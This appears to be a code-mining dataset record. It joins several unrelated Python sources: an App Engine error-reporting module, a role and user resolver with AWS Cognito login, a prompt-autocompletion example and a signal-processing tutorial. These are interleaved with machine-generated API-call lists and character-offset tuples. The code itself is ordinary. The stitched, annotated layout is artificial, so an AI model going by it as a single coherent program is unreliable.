silenced_until, '%Y-%m-%dT%H:%M')
if threshold:
item.threshold = int(threshold)
item.put()
self.get()
### Cron jobs.
class CronEreporter2Mail(webapp2.RequestHandler):
"""Generate and emails an exception report."""
@decorators.require_cronjob
def get(self):
"""Sends email(s) containing the errors logged."""
# Do not use self.request.host_url because it will be http:// and will point
# to the backend, with an host format that breaks the SSL certificate.
# TODO(maruel): On the other hand, Google Apps instances are not hosted on
# appspot.com.
host_url = 'https://%s.appspot.com' % app_identity.get_application_id()
request_id_url = host_url + '/restricted/ereporter2/request/'
report_url = host_url + '/restricted/ereporter2/report'
recipients = self.request.get('recipients', acl.get_ereporter2_recipients())
result = ui._generate_and_email_report(
utils.get_module_version_list(None, False),
recipients,
request_id_url,
report_url,
{})
self.response.headers['Content-Type'] = 'text/plain; charset=utf-8'
if result:
self.response.write('Success.')
else:
# Do not HTTP 500 since we do not want it to be retried.
self.response.write('Failed.')
class CronEreporter2Cleanup(webapp2.RequestHandler):
"""Deletes old error reports."""
@decorators.require_cronjob
def get(self):
old_cutoff = utils.utcnow() - on_error.ERROR_TIME_TO_LIVE
items = models.Error.query(
models.Error.created_ts < old_cutoff,
default_options=ndb.QueryOptions(keys_only=True))
out = len(ndb.delete_multi(items))
self.response.headers['Content-Type'] = 'text/plain; charset=utf-8'
self.response.write(str(out))
### Public API.
class OnErrorHandler(auth.AuthenticatingHandler):
"""Adds an error report.
This one is open so errors like authentication reports are logged in too.
This means we could get spammed a lot about it. Implement DDoS protection by
rate limiting once a kid figures out.
"""
xsrf_token_enforce_on = ()
# TODO(maruel): This was copied from ../../auth/ui/rest_api.py and needs to be
# factored out.
def parse_body(self):
"""Parse JSON body and verifies it's a dict."""
expected = ('application/json', 'application/json; charset=utf-8')
if self.request.headers.get('Content-Type').lower() not in expected:
msg = 'Expecting JSON body with content type \'application/json\''
self.abort(400, msg)
try:
body = json.loads(self.request.body)
if not isinstance(body, dict):
raise ValueError()
except ValueError:
self.abort(400, 'Not a valid json dict body')
return body
@auth.public
def post(self):
body = self.parse_body()
version = body.get('v')
# Do not enforce version for now, just assert it is present.
if not version:
self.abort(400, 'Missing version')
report = body.get('r')
if not report:
self.abort(400, 'Missing report')
kwargs = dict(
(k, report[k]) for k in on_error.VALID_ERROR_KEYS if report.get(k))
report_id = on_error.log_request(self.request, add_params=False, **kwargs)
self.response.headers['Content-Type'] = 'application/json; charset=utf-8'
body = {
'id': report_id,
'url':
'%s/restricted/ereporter2/errors/%d' %
(self.request.host_url, report_id),
}
self.response.write(utils.encode_to_json(body))
def get_frontend_routes():
return [
webapp2.Route(
r'/restricted/ereporter2/errors',
RestrictedEreporter2ErrorsList),
webapp2.Route(
r'/restricted/ereporter2/errors/<error_id:\d+>',
RestrictedEreporter2Error),
webapp2.Route(
r'/restricted/ereporter2/report',
RestrictedEreporter2Report),
webapp2.Route(
r'/restricted/ereporter2/request/<request_id:[0-9a-fA-F]+>',
RestrictedEreporter2Request),
webapp2.Route(
r'/restricted/ereporter2/silence',
RestrictedEreporter2Silence),
# Public API.
webapp2.Route(
'/ereporter2/api/v1/on_error', OnErrorHandler),
]
def get_backend_routes():
# This requires a cron job to this URL.
return [
webapp2.Route(
r'/internal/cron/ereporter2/cleanup', CronEreporter2Cleanup),
webapp2.Route(
r'/internal/cron/ereporter2/mail', CronEreporter2Mail),
]
|
[
"itertools.chain.from_iterable",
"components.template.render",
"google.appengine.api.app_identity.get_application_id",
"json.loads",
"components.utils.utcnow",
"components.auth.require",
"time.time",
"components.utils.encode_to_json",
"datetime.datetime.strptime",
"google.appengine.ext.ndb.delete_multi",
"google.appengine.ext.ndb.QueryOptions",
"webapp2.Route",
"google.appengine.ext.ndb.Key",
"components.utils.get_module_version_list"
] |
[((874, 912), 'components.auth.require', 'auth.require', (['acl.is_ereporter2_viewer'], {}), '(acl.is_ereporter2_viewer)\n', (886, 912), False, 'from components import auth\n'), ((2640, 2678), 'components.auth.require', 'auth.require', (['acl.is_ereporter2_viewer'], {}), '(acl.is_ereporter2_viewer)\n', (2652, 2678), False, 'from components import auth\n'), ((3080, 3118), 'components.auth.require', 'auth.require', (['acl.is_ereporter2_viewer'], {}), '(acl.is_ereporter2_viewer)\n', (3092, 3118), False, 'from components import auth\n'), ((3780, 3818), 'components.auth.require', 'auth.require', (['acl.is_ereporter2_viewer'], {}), '(acl.is_ereporter2_viewer)\n', (3792, 3818), False, 'from components import auth\n'), ((4191, 4229), 'components.auth.require', 'auth.require', (['acl.is_ereporter2_viewer'], {}), '(acl.is_ereporter2_viewer)\n', (4203, 4229), False, 'from components import auth\n'), ((4721, 4759), 'components.auth.require', 'auth.require', (['acl.is_ereporter2_editor'], {}), '(acl.is_ereporter2_editor)\n', (4733, 4759), False, 'from components import auth\n'), ((1741, 1788), 'components.utils.get_module_version_list', 'utils.get_module_version_list', (['modules', 'tainted'], {}), '(modules, tainted)\n', (1770, 1788), False, 'from components import utils\n'), ((9259, 9337), 'webapp2.Route', 'webapp2.Route', (['"""/restricted/ereporter2/errors"""', 'RestrictedEreporter2ErrorsList'], {}), "('/restricted/ereporter2/errors', RestrictedEreporter2ErrorsList)\n", (9272, 9337), False, 'import webapp2\n'), ((9361, 9454), 'webapp2.Route', 'webapp2.Route', (['"""/restricted/ereporter2/errors/<error_id:\\\\d+>"""', 'RestrictedEreporter2Error'], {}), "('/restricted/ereporter2/errors/<error_id:\\\\d+>',\n RestrictedEreporter2Error)\n", (9374, 9454), False, 'import webapp2\n'), ((9473, 9547), 'webapp2.Route', 'webapp2.Route', (['"""/restricted/ereporter2/report"""', 'RestrictedEreporter2Report'], {}), "('/restricted/ereporter2/report', RestrictedEreporter2Report)\n", (9486, 9547), False, 'import webapp2\n'), ((9571, 9677), 'webapp2.Route', 'webapp2.Route', (['"""/restricted/ereporter2/request/<request_id:[0-9a-fA-F]+>"""', 'RestrictedEreporter2Request'], {}), "('/restricted/ereporter2/request/<request_id:[0-9a-fA-F]+>',\n RestrictedEreporter2Request)\n", (9584, 9677), False, 'import webapp2\n'), ((9697, 9773), 'webapp2.Route', 'webapp2.Route', (['"""/restricted/ereporter2/silence"""', 'RestrictedEreporter2Silence'], {}), "('/restricted/ereporter2/silence', RestrictedEreporter2Silence)\n", (9710, 9773), False, 'import webapp2\n'), ((9816, 9876), 'webapp2.Route', 'webapp2.Route', (['"""/ereporter2/api/v1/on_error"""', 'OnErrorHandler'], {}), "('/ereporter2/api/v1/on_error', OnErrorHandler)\n", (9829, 9876), False, 'import webapp2\n'), ((9974, 10047), 'webapp2.Route', 'webapp2.Route', (['"""/internal/cron/ereporter2/cleanup"""', 'CronEreporter2Cleanup'], {}), "('/internal/cron/ereporter2/cleanup', CronEreporter2Cleanup)\n", (9987, 10047), False, 'import webapp2\n'), ((10063, 10130), 'webapp2.Route', 'webapp2.Route', (['"""/internal/cron/ereporter2/mail"""', 'CronEreporter2Mail'], {}), "('/internal/cron/ereporter2/mail', CronEreporter2Mail)\n", (10076, 10130), False, 'import webapp2\n'), ((2445, 2496), 'components.template.render', 'template.render', (['"""ereporter2/requests.html"""', 'params'], {}), "('ereporter2/requests.html', params)\n", (2460, 2496), False, 'from components import template\n'), ((2866, 2927), 'components.template.render', 'template.render', (['"""ereporter2/request.html"""', "{'request': data}"], {}), "('ereporter2/request.html', {'request': data})\n", (2881, 2927), False, 'from components import template\n'), ((3533, 3547), 'components.utils.utcnow', 'utils.utcnow', ([], {}), '()\n', (3545, 3547), False, 'from components import utils\n'), ((3583, 3632), 'components.template.render', 'template.render', (['"""ereporter2/errors.html"""', 'params'], {}), "('ereporter2/errors.html', params)\n", (3598, 3632), False, 'from components import template\n'), ((4005, 4019), 'components.utils.utcnow', 'utils.utcnow', ([], {}), '()\n', (4017, 4019), False, 'from components import utils\n'), ((4055, 4103), 'components.template.render', 'template.render', (['"""ereporter2/error.html"""', 'params'], {}), "('ereporter2/error.html', params)\n", (4070, 4103), False, 'from components import template\n'), ((4665, 4715), 'components.template.render', 'template.render', (['"""ereporter2/silence.html"""', 'params'], {}), "('ereporter2/silence.html', params)\n", (4680, 4715), False, 'from components import template\n'), ((6373, 6406), 'google.appengine.api.app_identity.get_application_id', 'app_identity.get_application_id', ([], {}), '()\n', (6404, 6406), False, 'from google.appengine.api import app_identity\n'), ((6666, 6708), 'components.utils.get_module_version_list', 'utils.get_module_version_list', (['None', '(False)'], {}), '(None, False)\n', (6695, 6708), False, 'from components import utils\n'), ((7175, 7189), 'components.utils.utcnow', 'utils.utcnow', ([], {}), '()\n', (7187, 7189), False, 'from components import utils\n'), ((7370, 7393), 'google.appengine.ext.ndb.delete_multi', 'ndb.delete_multi', (['items'], {}), '(items)\n', (7386, 7393), False, 'from google.appengine.ext import ndb\n'), ((8271, 8300), 'json.loads', 'json.loads', (['self.request.body'], {}), '(self.request.body)\n', (8281, 8300), False, 'import json\n'), ((9187, 9213), 'components.utils.encode_to_json', 'utils.encode_to_json', (['body'], {}), '(body)\n', (9207, 9213), False, 'from components import utils\n'), ((1448, 1459), 'time.time', 'time.time', ([], {}), '()\n', (1457, 1459), False, 'import time\n'), ((7322, 7354), 'google.appengine.ext.ndb.QueryOptions', 'ndb.QueryOptions', ([], {'keys_only': '(True)'}), '(keys_only=True)\n', (7338, 7354), False, 'from google.appengine.ext import ndb\n'), ((2040, 2097), 'itertools.chain.from_iterable', 'itertools.chain.from_iterable', (['(e.versions for e in errors)'], {}), '(e.versions for e in errors)\n', (2069, 2097), False, 'import itertools\n'), ((2236, 2294), 'itertools.chain.from_iterable', 'itertools.chain.from_iterable', (['(i.versions for i in ignored)'], {}), '(i.versions for i in ignored)\n', (2265, 2294), False, 'import itertools\n'), ((4848, 4899), 'google.appengine.ext.ndb.Key', 'ndb.Key', (['models.ErrorReportingMonitoring', 'to_delete'], {}), '(models.ErrorReportingMonitoring, to_delete)\n', (4855, 4899), False, 'from google.appengine.ext import ndb\n'), ((5682, 5742), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['silenced_until', '"""%Y-%m-%dT%H:%M"""'], {}), "(silenced_until, '%Y-%m-%dT%H:%M')\n", (5708, 5742), False, 'import datetime\n')]
|
#!/usr/bin/env python
"""
Autocompletion example that shows meta-information alongside the completions.
"""
from quo.completion import WordCompleter
from quo.prompt import Prompt
animal_completer = WordCompleter(
[
"alligator",
"ant",
"ape",
"bat",
"bear",
"beaver",
"bee",
"bison",
"butterfly",
"cat",
"chicken",
"crocodile",
"dinosaur",
"dog",
"dolphin",
"dove",
"duck",
"eagle",
"elephant",
],
meta_dict={
"alligator": "An alligator is a crocodilian in the genus Alligator of the family Alligatoridae.",
"ant": "Ants are eusocial insects of the family Formicidae",
"ape": "Apes (Hominoidea) are a branch of Old World tailless anthropoid catarrhine primates ",
"bat": "Bats are mammals of the order Chiroptera",
}
)
session = Prompt(
completer=animal_completer,
complete_style="multi_column"
)
def main():
text = session.prompt("Give some animals: ")
print("You said: %s" % text)
if __name__ == "__main__":
main()
|
[
"quo.completion.WordCompleter",
"quo.prompt.Prompt"
] |
[((201, 738), 'quo.completion.WordCompleter', 'WordCompleter', (["['alligator', 'ant', 'ape', 'bat', 'bear', 'beaver', 'bee', 'bison',\n 'butterfly', 'cat', 'chicken', 'crocodile', 'dinosaur', 'dog',\n 'dolphin', 'dove', 'duck', 'eagle', 'elephant']"], {'meta_dict': "{'alligator':\n 'An alligator is a crocodilian in the genus Alligator of the family Alligatoridae.'\n , 'ant': 'Ants are eusocial insects of the family Formicidae', 'ape':\n 'Apes (Hominoidea) are a branch of Old World tailless anthropoid catarrhine primates '\n , 'bat': 'Bats are mammals of the order Chiroptera'}"}), "(['alligator', 'ant', 'ape', 'bat', 'bear', 'beaver', 'bee',\n 'bison', 'butterfly', 'cat', 'chicken', 'crocodile', 'dinosaur', 'dog',\n 'dolphin', 'dove', 'duck', 'eagle', 'elephant'], meta_dict={'alligator':\n 'An alligator is a crocodilian in the genus Alligator of the family Alligatoridae.'\n , 'ant': 'Ants are eusocial insects of the family Formicidae', 'ape':\n 'Apes (Hominoidea) are a branch of Old World tailless anthropoid catarrhine primates '\n , 'bat': 'Bats are mammals of the order Chiroptera'})\n", (214, 738), False, 'from quo.completion import WordCompleter\n'), ((933, 998), 'quo.prompt.Prompt', 'Prompt', ([], {'completer': 'animal_completer', 'complete_style': '"""multi_column"""'}), "(completer=animal_completer, complete_style='multi_column')\n", (939, 998), False, 'from quo.prompt import Prompt\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
from importlib.util import find_spec
from importlib import import_module
from silvaengine_utility import Utility
from jose import jwk, jwt
from .types import (
RoleType as OutputRoleType,
RolesType,
CertificateType,
UserRelationshipType,
SimilarUserType,
SimilarUsersType,
RoleDetectionType,
)
from .models import RelationshipModel, RoleModel, RoleType
from .handlers import _get_user_permissions
import boto3, os, hmac, hashlib, base64, json
# @TODO: Apply status check
def _resolve_roles(info, **kwargs):
try:
arguments = {
"limit": int(
kwargs.get(
"page_size",
info.context.get("setting", {}).get("max_size_per_page", 10),
)
),
"last_evaluated_key": None,
"filter_condition": None,
}
total = 0
# Build filter conditions.
# @SEE: {"ARGUMENT_NAME": "FIELD_NAME_OF_DATABASE_TABLE", ...}
mappings = {
"is_admin": "is_admin",
"name": "name",
"role_description": "description",
"role_type": "type",
"status": "status",
}
filter_conditions = []
# Get filter condition from arguments
# @TODO: If there is an operation such as `is_in`, this method or mapping must be extended`
for argument, field in mappings.items():
if kwargs.get(argument) is None or not hasattr(RoleModel, field):
continue
if field == "name":
filter_conditions.append(
(
getattr(RoleModel, field).contains(
str(kwargs.get(argument)).strip()
)
)
)
else:
filter_conditions.append(
(getattr(RoleModel, field) == kwargs.get(argument))
)
if kwargs.get("user_ids"):
role_ids = [
str(relationship.role_id).strip()
for relationship in RelationshipModel.scan(
RelationshipModel.role_id.is_in(*list(set(kwargs.get("user_ids"))))
)
]
if len(role_ids):
filter_conditions.append((RoleModel.role_id.is_in(*role_ids)))
if len(filter_conditions):
arguments["filter_condition"] = filter_conditions.pop(0)
for condition in filter_conditions:
arguments["filter_condition"] = (
arguments.get("filter_condition") & condition
)
# Count total of roles
for _ in RoleModel.scan(filter_condition=arguments.get("filter_condition")):
total += 1
# Pagination.
if arguments.get("limit") > 0 and kwargs.get("page_number", 0) > 1:
pagination_arguments = {
"limit": (int(kwargs.get("page_number", 0)) - 1)
* arguments.get("limit"),
"last_evaluated_key": None,
"filter_condition": arguments.get("filter_condition"),
}
# Skip (int(kwargs.get("page_number", 0)) - 1) rows
pagination_results = RoleModel.scan(**pagination_arguments)
# Discard the results of the iteration, and extract the cursor of the page offset from the iterator.
_ = [role for role in pagination_results]
# The iterator needs to be traversed first, and then the pagination cursor can be obtained through `last_evaluated_key` after the traversal is completed.
arguments["last_evaluated_key"] = pagination_results.last_evaluated_key
if (
arguments.get("last_evaluated_key") is None
or pagination_results.total_count == total
):
return None
# Query role form database.
results = RoleModel.scan(**arguments)
roles = [
OutputRoleType(
**Utility.json_loads(
Utility.json_dumps(dict(**role.__dict__["attribute_values"]))
)
)
for role in results
]
if results.total_count < 1:
return None
return RolesType(
items=roles,
page_number=kwargs.get("page_number", 1),
page_size=arguments.get("limit"),
total=total,
)
except Exception as e:
raise e
# @TODO: Apply status check
# Query users by relationship.
def _resolve_users(info, **kwargs):
try:
arguments = {
"limit": int(
kwargs.get(
"page_size",
info.context.get("setting", {}).get("max_size_per_page", 10),
)
),
"last_evaluated_key": None,
"filter_condition": None,
}
total = 0
# Build filter conditions.
# @SEE: {"ARGUMENT_NAME": "FIELD_NAME_OF_DATABASE_TABLE", ...}
# Role model
role_field_argument_mappings_eq = {
"role_status": "status",
"is_admin_role": "is_admin",
}
role_field_argument_mappings_in = {
"role_type": "type",
"role_name": "name",
"role_id": "role_id",
}
role_filter_conditions = []
# eq: Get filter condition from arguments for Roles
for argument, field in role_field_argument_mappings_eq.items():
if kwargs.get(argument) is None or not hasattr(RoleModel, field):
continue
role_filter_conditions.append(
(getattr(RoleModel, field) == kwargs.get(argument))
)
# in: Get filter condition from arguments for Roles
for argument, field in role_field_argument_mappings_in.items():
if (
not hasattr(RoleModel, field)
or type(kwargs.get(argument)) is not list
or len(kwargs.get(argument, [])) < 1
):
continue
role_filter_conditions.append(
(getattr(RoleModel, field).is_in(*kwargs.get(argument)))
)
# Join the filter conditions
if len(role_filter_conditions):
arguments["filter_condition"] = role_filter_conditions.pop(0)
for condition in role_filter_conditions:
arguments["filter_condition"] = (
arguments["filter_condition"] & condition
)
# Pagination.
if arguments.get("limit") > 0 and kwargs.get("page_number", 0) > 1:
pagination_arguments = {
"limit": (int(kwargs.get("page_number", 0)) - 1)
* arguments.get("limit"),
"last_evaluated_key": None,
"filter_condition": arguments["filter_condition"],
}
# Skip (int(kwargs.get("page_number", 0)) - 1) rows
pagination_results = RoleModel.scan(**pagination_arguments)
# Discard the results of the iteration, and extract the cursor of the page offset from the iterator.
_ = [role for role in pagination_results]
arguments["last_evaluated_key"] = pagination_results.last_evaluated_key
if (
arguments.get("last_evaluated_key") is None
or pagination_results.total_count == total
):
return None
# Count total of roles
roles = {}
for role in RoleModel.scan(**arguments):
if role:
roles[role.role_id] = SimilarUserType(
users=[],
**Utility.json_loads(
Utility.json_dumps(dict(**role.__dict__["attribute_values"]))
)
)
total += 1
if (
kwargs.get("role_id") and roles.get(kwargs.get("role_id")) is None
) or total == 0:
return None
relatinship_filter_conditions = [
(RelationshipModel.role_id.is_in(*roles.keys()))
]
# Relationship model
relationship_field_argument_mappings_eq = {
"relationship_status": "status",
"relationship_type": "type",
}
relationship_field_argument_mappings_in = {
"owner_id": "group_id",
}
# eq: Get filter condition from arguments
for argument, field in relationship_field_argument_mappings_eq.items():
if kwargs.get(argument) is None or not hasattr(RelationshipModel, field):
continue
relatinship_filter_conditions.append(
(getattr(RelationshipModel, field) == kwargs.get(argument))
)
# in: Get filter condition from arguments
for argument, field in relationship_field_argument_mappings_in.items():
if (
not hasattr(RelationshipModel, field)
or type(kwargs.get(argument)) is not list
or len(kwargs.get(argument, [])) < 1
):
continue
relatinship_filter_conditions.append(
(getattr(RelationshipModel, field).is_in(*kwargs.get(argument)))
)
# Join the filter conditions
filter_condition = None
if len(relatinship_filter_conditions):
filter_condition = relatinship_filter_conditions.pop(0)
for condition in relatinship_filter_conditions:
filter_condition = filter_condition & condition
# Query data from the database.
results = RelationshipModel.scan(filter_condition=filter_condition)
relationships = [
UserRelationshipType(
**Utility.json_loads(
Utility.json_dumps(
dict(**relationship.__dict__["attribute_values"])
)
)
)
for relationship in results
]
if results.total_count < 1:
return None
hooks = (
[
hook.strip()
for hook in info.context.get("setting", {})
.get("custom_hooks", "")
.split(",")
]
if info.context.get("setting", {}).get("custom_hooks")
else []
)
if len(hooks):
logger = info.context.get("logger")
for hook in hooks:
fragments = hook.split(":", 3)
if len(fragments) < 3:
for i in (0, 3 - len(fragments)):
fragments.append(None)
elif len(fragments) > 3:
fragments = fragments[0:3]
module_name, class_name, function_name = fragments
fn = Utility.import_dynamically(
module_name, function_name, class_name, {"logger": logger}
)
if fn is None:
continue
users = fn(
list(set([relationship.user_id for relationship in relationships]))
)
if len(users):
for relationship in relationships:
user_ids = list(
set(
[
# user.cognito_user_sub
str(user["id"])
for user in roles[
str(relationship.role_id).strip()
].users
# if hasattr(user, "cognito_user_sub")
if ("id" in user)
]
)
)
if (
relationship.role_id
and roles.get(str(relationship.role_id).strip())
and relationship.user_id
and users.get(str(relationship.user_id).strip())
and str(relationship.user_id).strip() not in user_ids
):
roles[str(relationship.role_id).strip()].users.append(
users.get(str(relationship.user_id).strip())
)
# items.append(relationship)
# relationships = items
return SimilarUsersType(
items=roles.values(),
page_number=kwargs.get("page_number", 1),
page_size=arguments.get("limit"),
total=total,
)
except Exception as e:
raise e
# Query role info by specified ID.
def _resolve_role(info, **kwargs):
role = RoleModel.get(kwargs.get("role_id"))
return OutputRoleType(
**Utility.json_loads(Utility.json_dumps(role.__dict__["attribute_values"]))
)
# Login
def _resolve_certificate(info, **kwargs):
try:
username = kwargs.get("username")
password = kwargs.get("password")
assert username or password, "Username or password is required"
settings = info.context.get("setting", {})
region_name = (
settings.get("region_name")
if settings.get("region_name")
else os.getenv("REGIONNAME")
)
aws_access_key_id = (
settings.get("aws_access_key_id")
if settings.get("aws_access_key_id")
else os.getenv("aws_access_key_id")
)
aws_secret_access_key = (
settings.get("aws_secret_access_key")
if settings.get("aws_secret_access_key")
else os.getenv("aws_secret_access_key")
)
app_client_id = (
settings.get("app_client_id")
if settings.get("app_client_id")
else os.getenv("app_client_id")
)
app_client_secret = (
settings.get("app_client_secret")
if settings.get("app_client_secret")
else os.getenv("app_client_secret")
)
if (
not region_name
or not aws_access_key_id
or not aws_secret_access_key
or not app_client_id
or not app_client_secret
):
raise Exception("Missing required configuration", 400)
cognitoIdp = boto3.client(
"cognito-idp",
region_name=region_name,
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
)
digest = hmac.new(
key=app_client_secret.encode("utf-8"),
msg=(username + app_client_id).encode("utf-8"),
digestmod=hashlib.sha256,
).digest()
response = cognitoIdp.initiate_auth(
AuthFlow="USER_PASSWORD_AUTH",
AuthParameters={
"USERNAME": username,
"PASSWORD": password,
"SECRET_HASH": base64.b64encode(digest).decode(),
},
ClientId=app_client_id,
)
if not response or not response.get("AuthenticationResult", {}).get("IdToken"):
raise Exception("Failed to sign in on cognito")
# @TODO: hooks
hooks = (
[
hook.strip()
for hook in settings.get(
"custom_signin_hooks",
).split(",")
]
if settings.get("custom_signin_hooks")
else []
)
# hooks = ["relation_engine:RelationEngine:get_default_for_login"]
token_claims = jwt.get_unverified_claims(
response.get("AuthenticationResult").get("IdToken")
)
if token_claims.get("teams"):
token_claims.pop("teams")
if len(hooks):
logger = info.context.get("logger")
for hook in hooks:
fragments = hook.split(":", 3)
if len(fragments) < 3:
for i in (0, 3 - len(fragments)):
fragments.append(None)
elif len(fragments) > 3:
fragments = fragments[0:3]
module_name, class_name, function_name = fragments
# 1. Load module by dynamic
spec = find_spec(module_name)
if spec is None:
continue
agent = import_module(module_name)
if hasattr(agent, class_name):
agent = getattr(agent, class_name)(logger)
if not hasattr(agent, function_name):
continue
result = getattr(agent, function_name)(token_claims)
if type(result) is dict:
token_claims.update(result)
return CertificateType(
access_token=response.get("AuthenticationResult").get("AccessToken"),
id_token=response.get("AuthenticationResult").get("IdToken"),
refresh_token=response.get("AuthenticationResult").get("RefreshToken"),
expires_in=response.get("AuthenticationResult").get("ExpiresIn"),
token_type=response.get("AuthenticationResult").get("TokenType"),
context=token_claims,
permissions=_get_user_permissions(token_claims),
)
except Exception as e:
raise e
# Role uniqueness detection
def _resolve_detection(info, **kwargs):
role_name = kwargs.get("name")
filter_conditions = (
((RoleModel.name == role_name))
if role_name is not None and role_name != ""
else (
(
RoleModel.type.is_in(
*[
RoleType.ACCOUNT_MANAGER.value,
RoleType.QC_MANAGER.value,
RoleType.DEPT_MANAGER.value,
]
)
)
)
)
types = {
t.value: {
"type_alias": t.name,
"is_exclusive": t.value != RoleType.NORMAL.value,
"roles": [],
}
for t in RoleType
}
roles = {}
for role in RoleModel.scan(filter_condition=filter_conditions):
role = role.__dict__["attribute_values"]
if role.get("type") is not None:
if roles.get(role.get("type")) is None and types.get(role.get("type")):
roles[role.get("type")] = types.get(role.get("type"))
if (
roles.get(role.get("type")) is not None
and type(roles[role.get("type")].get("roles")) is list
):
roles[role.get("type")]["roles"].append(
{
"name": role.get("name", ""),
}
)
return RoleDetectionType(roles=roles)
|
[
"silvaengine_utility.Utility.json_dumps",
"boto3.client",
"importlib.import_module",
"importlib.util.find_spec",
"silvaengine_utility.Utility.import_dynamically",
"base64.b64encode",
"os.getenv"
] |
[((14608, 14747), 'boto3.client', 'boto3.client', (['"""cognito-idp"""'], {'region_name': 'region_name', 'aws_access_key_id': 'aws_access_key_id', 'aws_secret_access_key': 'aws_secret_access_key'}), "('cognito-idp', region_name=region_name, aws_access_key_id=\n aws_access_key_id, aws_secret_access_key=aws_secret_access_key)\n", (14620, 14747), False, 'import boto3, os, hmac, hashlib, base64, json\n'), ((13552, 13575), 'os.getenv', 'os.getenv', (['"""REGIONNAME"""'], {}), "('REGIONNAME')\n", (13561, 13575), False, 'import boto3, os, hmac, hashlib, base64, json\n'), ((13728, 13758), 'os.getenv', 'os.getenv', (['"""aws_access_key_id"""'], {}), "('aws_access_key_id')\n", (13737, 13758), False, 'import boto3, os, hmac, hashlib, base64, json\n'), ((13923, 13957), 'os.getenv', 'os.getenv', (['"""aws_secret_access_key"""'], {}), "('aws_secret_access_key')\n", (13932, 13957), False, 'import boto3, os, hmac, hashlib, base64, json\n'), ((14098, 14124), 'os.getenv', 'os.getenv', (['"""app_client_id"""'], {}), "('app_client_id')\n", (14107, 14124), False, 'import boto3, os, hmac, hashlib, base64, json\n'), ((14277, 14307), 'os.getenv', 'os.getenv', (['"""app_client_secret"""'], {}), "('app_client_secret')\n", (14286, 14307), False, 'import boto3, os, hmac, hashlib, base64, json\n'), ((10972, 11063), 'silvaengine_utility.Utility.import_dynamically', 'Utility.import_dynamically', (['module_name', 'function_name', 'class_name', "{'logger': logger}"], {}), "(module_name, function_name, class_name, {\n 'logger': logger})\n", (10998, 11063), False, 'from silvaengine_utility import Utility\n'), ((13096, 13149), 'silvaengine_utility.Utility.json_dumps', 'Utility.json_dumps', (["role.__dict__['attribute_values']"], {}), "(role.__dict__['attribute_values'])\n", (13114, 13149), False, 'from silvaengine_utility import Utility\n'), ((16552, 16574), 'importlib.util.find_spec', 'find_spec', (['module_name'], {}), '(module_name)\n', (16561, 16574), False, 'from importlib.util import find_spec\n'), ((16663, 16689), 'importlib.import_module', 'import_module', (['module_name'], {}), '(module_name)\n', (16676, 16689), False, 'from importlib import import_module\n'), ((15221, 15245), 'base64.b64encode', 'base64.b64encode', (['digest'], {}), '(digest)\n', (15237, 15245), False, 'import boto3, os, hmac, hashlib, base64, json\n')]
|
import numpy as np
import os
from scipy.io.wavfile import write as audio_write
### Generate data
data = np.random.uniform(size=(10000)) # single example
DATA = np.random.uniform(size=(10,10000)) # multi example
wavfiles, numpyfiles = [], []
datafolder = 'data_intro/data'
os.makedirs(datafolder,exist_ok=True)
os.makedirs(datafolder + '_numpy',exist_ok=True)
for k,D in enumerate(DATA):
wavfiles.append(os.path.join(datafolder,str(k) + '.wav'))
numpyfiles.append(os.path.join(datafolder + '_numpy',str(k) + '.npy'))
np.save(numpyfiles[k], D)
audio_write(wavfiles[k], rate=1, data=D)
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# create processing chain
dp = ProcessingChain()
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.summary()
# apply processing chain to data
# make sure to provide sampling frequency to dp. Kwargs are always accessible for
# all processing layer. Therefore, you should make sure naming DOES NOT overlap
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time (alternative)
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# create processing chain
# in this example, fs is already set in the processing chain
dp = ProcessingChain()
dp.add(Framing(windowsize=10,stepsize=10,axis=0,fs=1))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.summary()
# apply processing chain to data
output_data = dp(data)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time and fit this to normalization
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# create processing chain
dp = ProcessingChain()
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.add(Normalizer(type='standard'))
dp.summary()
# fit processing chain as Normalizer contains a 'fit' method to init parameters
dp.fit(DATA, fs=1)
# apply processing chain to data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Same as before but the data is loaded from wav file
### As a consequence no extra fs information needs to be provided for processing. This read from the wav.
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# define processing chain
dp = ProcessingChain()
dp.add(WavDatareader())
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.add(Normalizer(type='standard'))
dp.summary()
# fit to wavfiles
dp.fit(wavfiles) #fit from wav files
#dp.fit(['data_intro/data_numpy/0.wav', 'data_intro/data_numpy/1.wav', 'data_intro/data_numpy/3.wav', ...], fs=1)
output_data = dp(wavfiles[2]) # process from wavfiles
#output_data = dp('data_intro/data_numpy/2.wav',fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Same as before but the data is loaded from numpy file \
### As a consequence extra fs information needs to be provided for processing.
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# define processing chain
dp = ProcessingChain()
dp.add(NumpyDatareader())
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.add(Normalizer(type='standard'))
# fit to numpy files
dp.fit(numpyfiles, fs=1) #fit from npy files
#dp.fit(['data_intro/data_numpy/0.npy', 'data_intro/data_numpy/1.npy', 'data_intro/data_numpy/3.npy', ...], fs=1)
